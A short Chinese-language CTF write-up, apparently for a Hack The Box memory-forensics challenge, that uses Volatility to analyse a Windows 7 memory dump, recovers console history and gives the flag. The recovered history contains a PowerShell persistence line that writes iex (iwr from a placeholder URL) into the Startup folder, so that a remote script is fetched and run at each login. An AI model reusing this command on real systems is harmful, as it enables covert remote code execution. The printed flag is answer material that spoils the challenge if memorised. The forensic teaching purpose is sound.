zip里给了一个文件
WIN-LQPKRCS8Q5M-20201004-145724.raw
这是事件发生时受感染计算机的内存capture
可以用binwalk查看信息
列表很长,从信息中可以得知这是一个Windows memory dump
但是不知道Windows具体版本,可以通过Volatility的imageinfo工具来枚举可能的版本和配置文件
Volatility 是一个开源的内存取证工具,可以用于分析 Windows、Linux 和 Mac 系统的内存转储文件。
先尝试pslist列出目标系统中的进程列表
#指定配置为Win7SP1x64, 使用Volatility 的插件pslist来列出目标系统中的进程列表
python2 /opt/volatility/vol.py -f WIN-LQPKRCS8Q5M-20201004-145724.raw --profile=Win7SP1x64 pslist
插件还有notepad(pslist中与notepad有关的内容) cmdscan等
插件cmdscan可以提取目标系统内存中的console history
python2 /opt/volatility/vol.py -f WIN-LQPKRCS8Q5M-20201004-145724.raw --profile=Win7SP1x64 cmdscan
从运行结果中可以看到
cmdscan把一串url写到了startup目录下的3usy13fv.ps1文件中
echo iex (iwr "http://xxxx/test.ps1") >c:\user\appdata\startup/3usy12fv.ps1
iex: 这是 PowerShell 中的一个内置命令(别名),全称为 Invoke-Expression。它的作用是执行一个包含 PowerShell 语句的字符串。
(iwr "http://xxxx/test.ps1"): 这是一个嵌套的命令,使用了 PowerShell 的另一个内置命令 Invoke-WebRequest(简写为 iwr)。该命令从指定的 URL 下载一个名为 test.ps1 的 PowerShell 脚本。
这个命令的作用是从指定的 URL 下载一个 PowerShell 脚本,然后将其内容保存到指定的位置。如果在用户的启动目录下创建了一个这样的脚本,那么每次用户登录时,该脚本都将自动执行。
FLAG
可以看到解码的flag
HTB{W1Nd0ws_f0r3Ns1CS_3H?}